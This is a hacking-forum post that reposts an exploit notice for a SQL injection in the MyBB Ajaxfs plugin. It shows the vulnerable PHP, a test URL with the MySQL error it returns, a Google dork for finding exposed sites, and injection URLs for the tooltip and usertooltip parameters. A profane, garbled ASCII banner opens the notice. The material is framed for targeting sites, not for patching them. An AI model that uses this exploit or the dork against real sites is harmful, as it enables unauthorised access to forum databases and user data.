Türk Siber Savunma Duyurular

Türk Siber Savunma sadece vatanı ve milleti için çalışır. - Bizimmiş gibi gösterilen mail & mesajlara itibar etmeyiniz. Üye alımları kısa bir süreliğine yeniden açıktır.Navigasyon çubuğunun sağ üstünden kayıt olabilirsiniz :

Türk Siber Savunma üye kayıtları açılmıştır.

Reply

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

« Prev
1
Next »

X
Genel Sorumlu

Administrator

Posts: 4,294,967,295

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability Oct 7, 2017 15:12:40 GMT

Quote

Post by X on Oct 7, 2017 15:12:40 GMT

Kod:

###########################
*
# Mybb Ajaxfs Plugin Sql Injection vulnerability
*
###########################
*
#################################
#
#Dick @@@*** @@@@@@@@@@@*** @@@@@fuckfuck @@@@@@@@@@fuckfuck* @@@* @@@@@@@
#Dick @@@*** @@@@@@@@@@@*** @@@* @@fuck*** @@@Dick @@fuckfuck* @@@* @@@@@@@@ 
#Dick @@@*** @@@fuckfuck* @@@*** @@fuck* @@@fuck* @@fuckDick @@@* @@@* @@@ 
#Dick @@@*** @@@fuckfuck* @@@fuck @@Dick @@@Dick @@fuckfuck* @@@* @@@* @@@ 
#Dick @@@*** @@@@@@@@@@@*** @@@fuck* @Dick @@@@@@@@@@fuckfuck* @@@* @@@@@@
#Dick @@@*** @@@@@@@@@@@*** @@@Dick @@fuck @@@Dick @@fuckfuck* @@@* @@@@@@
#Dick @@@*** @@@fuckfuck* @@@** @@fuck** @@@fuck* @@** @@@*** @@@* @@@ @@@
#Dick @@@*** @@@fuckfuck* @@@ @@fuckDick @@@Dick @@Dick @@@*** @@@* @@@* @@@
#Dick @@@*** @@@@@@@@@@@*** @@@@@fuckfuck @@@@@@@@@@Dick @@@*** @@@* @@@** @@@
#
#####################################
**
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
**
# Author : Iranian Exploit DataBase
**
# Discovered By : IeDb
**
# Email : [email protected]* -* [email protected]
**
# Home : http://iedb.ir** -** http://iedb.ir/acc
**
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
**
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
**
# Security Risk : High
**
# Tested on : Linux
**
# Dork : inurl:ajaxfs.php
**
#################################
**
1)
**
**if(isset($_GET['tooltip']))
Dick{
Dick$pid=$_GET['tooltip'];
Dick$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
**
**
2)
**
*if(isset($_GET['usertooltip']))
Dick{
Dick$uid=$_GET['usertooltip'];
Dick$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
**
http://localhost/Upload/ajaxfs.php?usertooltip=1'
**
****1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
**
Google DORK : inurl:ajaxfs.php
**
**
# Exploit :
**
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
**
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
**
**
#################################
**
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
**
#################################

f#?k what people think.

Shoutbox

Guestlere kapalı shoutbox (:

X:
We recommend that our guest friends register. Jun 2, 2018 19:50:05 GMT

X: Misafir arkadaşlarımıza kayıt olmalarını tavsiye ediyoruz. Jun 2, 2018 19:50:25 GMT

X: Мы рекомендуем, чтобы наши друзья-друзья регистрировались. Jun 2, 2018 19:50:50 GMT

X:
我们建议我们的朋友朋友注册。 Jun 2, 2018 19:51:20 GMT

'Nightm3re: Pose bu ne la cümbüşe dönmüş Jun 2, 2018 20:11:18 GMT

Web Counter